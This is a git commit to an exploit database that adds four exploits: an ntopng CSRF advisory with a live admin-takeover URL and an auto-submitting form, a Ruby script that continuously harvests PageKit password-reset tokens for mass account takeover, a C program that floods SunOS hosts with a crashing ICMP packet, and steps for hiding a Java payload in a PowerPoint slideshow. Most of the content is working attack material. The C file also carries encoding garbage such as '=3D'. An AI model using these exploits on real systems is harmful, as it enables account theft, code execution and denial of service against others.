DB: 2017-01-23

4 new exploits SunOS 5.11 ICMP - Denial of Service Microsoft Power Point 2016 - Java Code Execution NTOPNG 2.4 Web Interface - Cross-Site Request Forgery PageKit 1.0.10 - Password Reset
2017-01-23 05:01:18 +00:00 · 2017-01-23 05:01:18 +00:00 · e96ad87c43
commit e96ad87c43
parent b1b494f790
5 changed files with 354 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -5341,6 +5341,7 @@ id,file,description,date,author,platform,type,port
 41025,platforms/windows/dos/41025.txt,"VideoLAN VLC Media Player 2.2.1 - 'DecodeAdpcmImaQT' Buffer Overflow",2016-05-27,"Patrick Coleman",windows,dos,0
 41030,platforms/windows/dos/41030.py,"SapLPD 7.40 - Denial of Service",2016-12-28,"Peter Baris",windows,dos,0
 41042,platforms/windows/dos/41042.html,"Mozilla Firefox < 50.1.0 - Use-After-Free",2017-01-13,"Marcin Ressel",windows,dos,0
+41142,platforms/unix/dos/41142.c,"SunOS 5.11 ICMP - Denial of Service",2017-01-22,"Todor Donev",unix,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -8758,6 +8759,7 @@ id,file,description,date,author,platform,type,port
 41076,platforms/linux/local/41076.py,"iSelect v1.4 - Local Buffer Overflow",2017-01-16,"Juan Sacco",linux,local,0
 41090,platforms/windows/local/41090.py,"SentryHD 02.01.12e - Privilege Escalation",2017-01-18,"Kacper Szurek",windows,local,0
 41130,platforms/android/local/41130.txt,"Google Android TSP sysfs - 'cmd_store' Multiple Overflows",2017-01-19,"Google Security Research",android,local,0
+41144,platforms/windows/local/41144.txt,"Microsoft Power Point 2016 - Java Code Execution",2017-01-21,"Fady Mohammed Osman",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -37073,3 +37075,5 @@ id,file,description,date,author,platform,type,port
 41138,platforms/php/webapps/41138.txt,"Affiliate Tracking Script 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0
 41139,platforms/php/webapps/41139.txt,"Mini CMS 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0
 41140,platforms/php/webapps/41140.txt,"B2B Alibaba Clone Script - SQL Injection",2017-01-20,"Ihsan Sencan",php,webapps,0
+41141,platforms/linux/webapps/41141.txt,"NTOPNG 2.4 Web Interface - Cross-Site Request Forgery",2017-01-22,hyp3rlinx,linux,webapps,0
+41143,platforms/php/webapps/41143.rb,"PageKit 1.0.10 - Password Reset",2017-01-21,"Saurabh Banawar",php,webapps,0
--- a/platforms/linux/webapps/41141.txt
+++ b/platforms/linux/webapps/41141.txt
@ -0,0 +1,111 @@
+[+]#####################################################################################
+[+] Credits / Discovery: John Page AKA Hyp3rlinX
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/NTOPNG-CSRF-TOKEN-BYPASS.txt
+[+] ISR: ApparitionSEC
+[+]#####################################################################################
+
+
+
+Vendor:
+============
+www.ntop.org
+
+
+Product:
+====================
+ntopng Web Interface
+v2.4.160627
+
+ntopng is the next generation version of the original ntop, a network
+traffic probe that shows the network usage, similar
+to what the popular top Unix command does. ntopng is based on libpcap and
+it has been written in a portable way in order to
+virtually run on every Unix platform, MacOSX and on Windows as well.
+
+
+Vulnerability Type:
+==================
+CSRF Token Bypass
+
+
+
+CVE Reference:
+================
+CVE-2017-5473
+
+
+
+Security Issue:
+=================
+By simply omitting the CSRF token or supplying arbitrary token values will
+bypass CSRF protection when making HTTP requests,
+to the ntopng web interface. Allowing remote attackers the rights to make
+HTTP requests on an authenticated users behalf, if
+the user clicks an malicious link or visits an attacker webpage etc.
+
+
+Exploit/POC:
+============
+
+1) Change admin password
+http://VICTIM-SERVER:3000/lua/admin/password_reset.lua?csrf=NOT-EVEN-CHECKED&username=admin&new_password=xyz123&confirm_new_password=xyz123
+
+
+2) Add arbitrary
+
+<form action="
+http://VICTIM-SERVER:3000/lua/admin/add_user.lua?csrf=NOT-EVEN-CHECKED"
+method="GET">
+<input type="hidden" name="username"  value="hyp3rlinx">
+<input type="hidden" name="full_name"  value="TheApparitioN">
+<input type="hidden" name="password"  value="abc123">
+<input type="hidden" name="confirm_password"  value="abc123">
+<input type="hidden" name="host_role"  value="administrator">
+<input type="hidden" name="allowed_networks"  value="0.0.0.0/,::/">
+<input type="hidden" name="allowed_interface"  value="HTTP/1.1">
+<script>document.forms[0].submit()</script>
+</form>
+
+
+
+Disclosure Timeline:
+=====================
+Vendor Notification: January 11, 2017
+Vendor acknowledgement: January 12, 2017
+Vendor Fixed Issue
+January 20, 2017 : Public Disclosure
+
+
+
+Network Access:
+===============
+Remote
+
+
+Impact:
+======================
+Information Disclosure
+Privilege Escalation
+
+
+
+Severity:
+===========
+High
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the
+information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author
+prohibits any malicious use of security related information
+or exploits by the author or elsewhere.  All content (c) HYP3RLINX -
+Apparition
--- a/platforms/php/webapps/41143.rb
+++ b/platforms/php/webapps/41143.rb
@ -0,0 +1,107 @@
+# Exploit Title: Remote PageKit Password Reset Vulnerability
+# Date:21-01-2017
+# Software Link: http://pagekit.com/
+# Exploit Author: Saurabh Banawar from SecureLayer7
+
+# Contact: http://twitter.com/securelayer7
+# Website: https://securelayer7.net
+# Category: webapps
+
+1. Description
+
+Anyremote user can reset the password by reading the debug log, the exploit
+can be successfully executed, if the debug option is enabled in the Pagekit
+CMS.
+
+CMS Pentest report can be found here:https://securelayer7.net/
+download/pdf/SecureLayer7-Pentest-report-Pagekit-CMS.pdf
+
+
+2. Proof of Concept
+
+require 'net/http'
+
+#Enter the domain/IP address of the site for which you want to test this vulnerability
+vulnerableSite = 'http://127.0.0.1'
+
+loopCount = 0
+while loopCount == 0
+
+
+#We request the Login page which has the debug parameter
+url = URI.parse(vulnerableSite + '/pagekit/index.php/user/login')
+request = Net::HTTP::Get.new(url.to_s)
+resp = Net::HTTP.start(url.host, url.port) {|http|
+http.request(request)
+}
+
+#The response is received and is sent to many regular expression to find the value of _debug parameter from its HTML source code
+bodyOfResponse =  resp.body
+myArray1 = bodyOfResponse.split(/"current":"/)
+outputOfMyArray1 = myArray1[1]
+myArray2 = outputOfMyArray1.split(/"};/)
+theSecret = myArray2[0]
+puts ""
+puts "The secret token to debug link is: #{theSecret}"
+puts ""
+url = URI.parse(vulnerableSite + '/pagekit/index.php/_debugbar/' + theSecret)
+request = Net::HTTP::Get.new(url.to_s)
+resp = Net::HTTP.start(url.host, url.port) {|http|
+http.request(request)
+}
+
+resp.body
+
+initial = resp.body
+
+#The count of number of victim users is found out
+ users = initial.scan(/user=.+?(?=")/)
+ c =  users.count
+ e = c.to_i
+ 
+#If the count is 0 then we continuosly monitor it
+ if c == 0 then puts "Currently no user has clicked on reset password like."
+ 
+ puts ""
+ puts "Trying again..."
+ puts ""
+ puts ""
+ 
+#If the count is greater than 0 then it means we found a victim. So, find the password reset link and display it in the console
+ else
+ 
+ link1 = vulnerableSite + "/pagekit/index.php/user/resetpassword/confirm?user="
+ link2 = "&key="
+ i = 0
+  while i<e
+	securityToken = ''
+    a = real[i]
+	b = a.split('=')
+	c = b[1]
+	d = c.split('\\')
+	victimUserName = d[0]
+	puts "The victim is: #{victimUserName}"
+	f = b[2]
+	securityToken = f.scan(/[^\\]/)
+	securityTokenFiltered = securityToken.join
+	puts "The security token of victim is: #{securityTokenFiltered}"
+	puts "Link for account takeover"
+	puts "#{link1}#{victimUserName}#{link2}#{securityTokenFiltered}"
+	puts ""
+	puts ""
+	i += 1
+ end
+ 
+ 
+ end
+ 
+ # This loop runs forever because we want to continuosly monitor who is requesting a password reset and who has clicked on the link so that
+ # we can perform mass account takeovers
+ end
+ 
+ 
+
+3. Solution:
+
+Update to version 1.0.11
+https://github.com/pagekit/pagekit/releases/tag/1.0.11
--- a/platforms/unix/dos/41142.c
+++ b/platforms/unix/dos/41142.c
@ -0,0 +1,96 @@
+/*
+*  SunOS 5.11 Remote ICMP Weakness Kernel DoS Exploit
+*
+*  Todor Donev <todor.donev@gmail.com>
+*  http://www.ethical-hacker.org/
+*  https://www.facebook.com/ethicalhackerorg
+*
+*  Disclaimer:
+*  This or previous programs is for Educational
+*  purpose ONLY. Do not use it without permission.
+*  The usual disclaimer applies, especially the
+*  fact that Todor Donev is not liable for any
+*  damages caused by direct or indirect use of the
+*  information or functionality provided by these
+*  programs. The author or any Internet provider
+*  bears NO responsibility for content or misuse
+*  of these programs or any derivatives thereof.
+*  By using these programs you accept the fact
+*  that any damage (dataloss, system crash,
+*  system compromise, etc.) caused by the use
+*  of these programs is not Todor Donev's
+*  responsibility.
+*
+*  Use them at your own risk!
+*
+*/
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <netinet/in.h>
+#include <netdb.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+=20
+unsigned char b00m[75] =3D
+{
+    0x45, 0xFF, 0x00, 0x4D, 0x0C,
+    0x52, 0x00, 0x00, 0x7E, 0x01,
+    0x0C, 0xF2, 0x85, 0x47, 0x21,
+    0x07, 0xC0, 0xA8, 0x0E, 0x58,
+    0x03, 0x01, 0xAE, 0x37, 0x6F,
+    0x3B, 0x66, 0xA7, 0x60, 0xAA,
+    0x76, 0xC1, 0xEC, 0xA7, 0x7D,
+    0xFA, 0x8A, 0x72, 0x8E, 0xC6,
+    0xE3, 0xD2, 0x64, 0x13, 0xE7,
+    0x4D, 0xBC, 0x01, 0x40, 0x5B,
+    0x8E, 0x8B, 0xE5, 0xEE, 0x5E,
+    0x37, 0xDD, 0xC2, 0x54, 0x8E,
+    0x8D, 0xCE, 0x0C, 0x42, 0x97,
+    0xA1, 0x8C, 0x04, 0x8A, 0xC2,=20
+    0x6B, 0xAE, 0xE9, 0x2E, 0xFE,
+} ;
+=20
+    long   resolve(char *target){
+    struct hostent *tgt;
+    long   addr;
+=20
+    tgt =3D gethostbyname(target);
+if (tgt =3D=3D NULL)
+  return(-1);
+    memcpy(&addr,tgt->h_addr,tgt->h_length);
+    memcpy(b00m+16,&addr,sizeof(long));
+  return(addr);
+}
+int main(int argc, char *argv[]){
+    struct  sockaddr_in dst;
+    long    saddr, daddr;
+    int     s0cket;
+    printf("[ SunOS 5.11 Remote ICMP Weakness Kernel DoS Exploit\n");
+    printf("[ Todor Donev <todor.donev@gmail.com> www.ethical-hacker.org\n"=
+);
+  if (argc < 2){
+    printf("[ Usage: %s <target>\n", *argv);
+    return(1);
+  }
+  daddr   =3D resolve(argv[1]);
+  saddr   =3D INADDR_ANY;
+  memcpy(b00m+16, &daddr, sizeof(long));
+  dst.sin_addr.s_addr   =3D daddr;
+  dst.sin_family        =3D AF_INET;
+  s0cket                =3D socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
+  if (s0cket =3D=3D -1)
+    return(1);
+    printf("[ ICMP Attacking: %s\n", argv[1]);
+  while(1){
+    if (sendto(s0cket,&b00m,75,0,(struct sockaddr *)&dst,sizeof(struct sock=
+addr_in)) =3D=3D -1){
+         perror("[ Error");
+         exit(-1);
+    }
+  }
+}
--- a/platforms/windows/local/41144.txt
+++ b/platforms/windows/local/41144.txt
@ -0,0 +1,36 @@
+# Exploit Title: Microsoft Power Point Java Payload Code Execution
+# Exploit Author: Fady Mohamed Osman (@fady_osman)
+# Exploit-db : http://www.exploit-db.com/author/?a=2986
+# Demo Video : https://www.youtube.com/watch?v=DOJSUJK7hRo
+# Video Tutorial : https://www.youtube.com/watch?v=Li_h-iuXgEM
+# Youtube Channel: https://www.youtube.com/user/cutehack3r
+# Date: Jan 21, 2017
+# Vendor Homepage: https://www.microsoft.com/
+# Software Link: https://www.office.com/
+# Version: Windows 7 x64 Ultimate Build 7601 Service Pack 1 Without any updates
+# Tested on: Windows 7 x64 Ultimate Build 7601 SP1 Without any updates, Power Point 2016 MSO 16.0.4266.1001 64-bit professional plus and Java Version 8 Update 101 (build 1.8.0_101-b13).
+
+Microsoft power point allows users to insert objects of arbitrary file types, at presentation time these objects can be activated by mouse movement or clicking.
+
+If the user have JAVA (or python or similar interpreters) an attacker can insert jar file or py file into the presentation and trigger it when mouse moves, for easier exploitation the attacker can use ppsx file which will load automatically in presentation mode and once the user opens the file and moves mouse it will trigger the payload.
+
+To exploit this issue:
+
+1 - Create a new power point presentation.
+2 - Insert object and choose "create from file" and choose the jar payload.
+3 - On the insert tab, click action and in both "mouse over" and "mouse click" tabs choose "object action" and choose "activate"
+4 - Scale the object to fit the whole slide so when the user opens the file it mouse will be over it, and just in case also if the user clicks it will open the jar file.
+5 - Save the file as ppsx file.
+
+POC file that will open a java pop up when executed but any java payload will also work including the meterpreter payloads generated by metasploit.
+
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41144.ppsx
+
+Please note that in a fully patched version a pop up will show asking the user to run the file which is useful if you're good at social engineering ;)
+
+Timeline:
+Aug 10, 2016 - Reported To Microsoft
+Sep 7, 2016 - Microsoft Said they're unable to have the same behaviour and asked me to update My system and check again.
+Sep 8, 2016 - sent to Microsoft to confirm that a pop up shows in case of a fully updated windows 7 version.
+Sep 17, 2016 - Microsoft asked for a video showing the bug in both updated and not updated versions, I sent the video in the same day.
+Sep 27, 2016 - Microsoft confirmed that the behavior can only produced in a non patched version and considered as not reproducible.